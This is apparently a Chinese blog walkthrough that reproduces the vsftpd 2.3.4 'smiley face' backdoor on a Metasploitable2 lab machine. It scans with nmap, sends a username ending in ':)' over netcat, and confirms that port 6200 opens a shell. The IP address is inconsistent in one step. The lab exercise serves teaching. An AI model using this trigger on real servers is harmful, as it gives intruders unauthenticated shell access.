vsftpd2.3.4笑脸漏洞
vsftpd2.3.4笑脸漏洞
该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。
1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig
查看靶机ip192.168.179.129
2、打开kali首先输入sudo su
,输入当前用户密码即可切换root,利用nmap -sV 192.168.179.129
对目标服务器进行服务及版本扫描
nmap是什么
nmap是linux最早的网络扫描工具和嗅探工具包,它可以用来扫描网络上电脑开放的网络连接端,确定哪些服务运行在那些连接端,并且推断出计算机运行的是哪个操作系统。它的基本功能有三个,一是探测主机是否在线,然后扫描主机端口,还可以推断主机所使用的操作系统是哪个。
3、扫描结果发现21端口是提供ftp服务的端口,服务器安装了vsftpd2.3.4版本的服务,因此可以利用笑脸漏洞来测试一下,输入命令 nmap -p 6200 192.168.179.129
发现端口是关闭的
4、另外开个窗口nc 192.168.178.129 21
连接靶机,user后随便加笑脸,密码随便 user xx:) pass xx
NC(netcat)被称为网络工具中的瑞士军刀,体积小巧,但功能强大。
NetCat使用指南
5、nmap -p 6200 目标ip查看端口是开放的
参考:添加链接描述
添加链接描述
vsftpd2.3.4笑脸漏洞相关推荐
- 实现笑脸漏洞vsftpd2.3.4
靶机metasploitable 默认登录账号和密码都是:msfadmin 登录后查看靶机IP:192.168.80.130 打开kali首先输入sudo su ,输入当前用户密码即可切换root,利 ...
- python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 一.漏洞介绍 vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 ...
- 笑脸漏洞(VSFTP2.3.4)复现
目录 一.Ftp笑脸漏洞原理 二.环境搭建 三.漏洞复现 一.Ftp笑脸漏洞原理 在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 ...
- VSFTPD v2.3.4 著名笑脸漏洞
VSFTPD v2.3.4 著名笑脸漏洞手工利用 Backdoor Command Execution:因为该版本的 VSFTPD 存在一个后门漏洞.即便该问题很快得到了相关开发人员的修复及删除,但也 ...
- 使用python利用FTP2.3.4的笑脸漏洞
首先FTP是一个文件传输协议,而且FTP是一种明文的传输协议,通过WIreshark抓包能够直接获取到FTP协议的传输内容. 而在FTP2.3.4版本中,当用户名中存在:)的笑脸标志时,能够直接执行系 ...
- 端口漏洞之21(FTP)
21(FTP) 端口简介 FTP 是 File Transfer Protocol(文件传输协议)的英文简称,而中文简称为"文件传输协议".用于 Internet 上的控制文件的双 ...
- 五、Kali Linux 2 漏洞扫描技术
漏洞扫描技术 对于渗透测试者来说,及时了解这些漏洞的信息是一项必备的技能.目前很多企业都采用了漏洞扫描器来对网络和系统来进行分析.漏洞扫描器通常是由两个部分组成的,一个是进行扫描的引擎部分,另一个是包 ...
- 内网渗透笔记——:)一个笑脸
打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials ...
- Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...
最新文章
- oracle创建表分区表,oracle创建分区表
- 用Saltstack的modules和grains实现实时监控平台
- 针对新手的Java EE7和Maven项目-第4部分-定义Ear模块
- 栈与队列在SGI STL的底层实现
- C#使用TCP/IP与ModBus进行通讯
- c语言插入排序算法_插入排序算法,流程图和C,C ++代码
- mysql select语句执行顺序
- 【IoT最佳实践】设备获取实时天气信息
- 117 Populating Next Right Pointers in Each Node II
- ios控制中心android版,IOS控制中心
- Xamarin Android中引用Jar包的方法
- uniapp安卓证书在线制作工具
- webshell及木马详解
- 计算机英语实用教程第五版答案,(计算机英语实用教程课后题参考答案.doc
- AT070TN92 群创工业液晶屏7寸宽温工控屏
- python3 ZIP文件密码破解
- java获取一天的开始时间和结束时间
- 各类行业资源学习资料大全
- IBIS模型:利用IBIS模型研究信号完整性问题
- RPA财务软件对社会的影响
热门文章
- 【ORB-SLAM2源码梳理5】关于双目帧Frame的构造函数
- 软通动力机考题目汇总
- Spring Security 之 Remember-Me (记住我)
- 基础教育弊端日益显现 中国课程改革势在必行
- 3_Semantic Pitfalls 语义错误
- 网络存储服务器拷贝文件夹,【群晖 DS218+ 2盘位 NAS网络存储服务器使用总结】配置|做工|指示灯|copy键_摘要频道_什么值得买...
- webpack使用详解
- 计算机7层网络以及每层协议
- 扎心了!互联网公司福利缩水指南
- VS2017 如何打包软件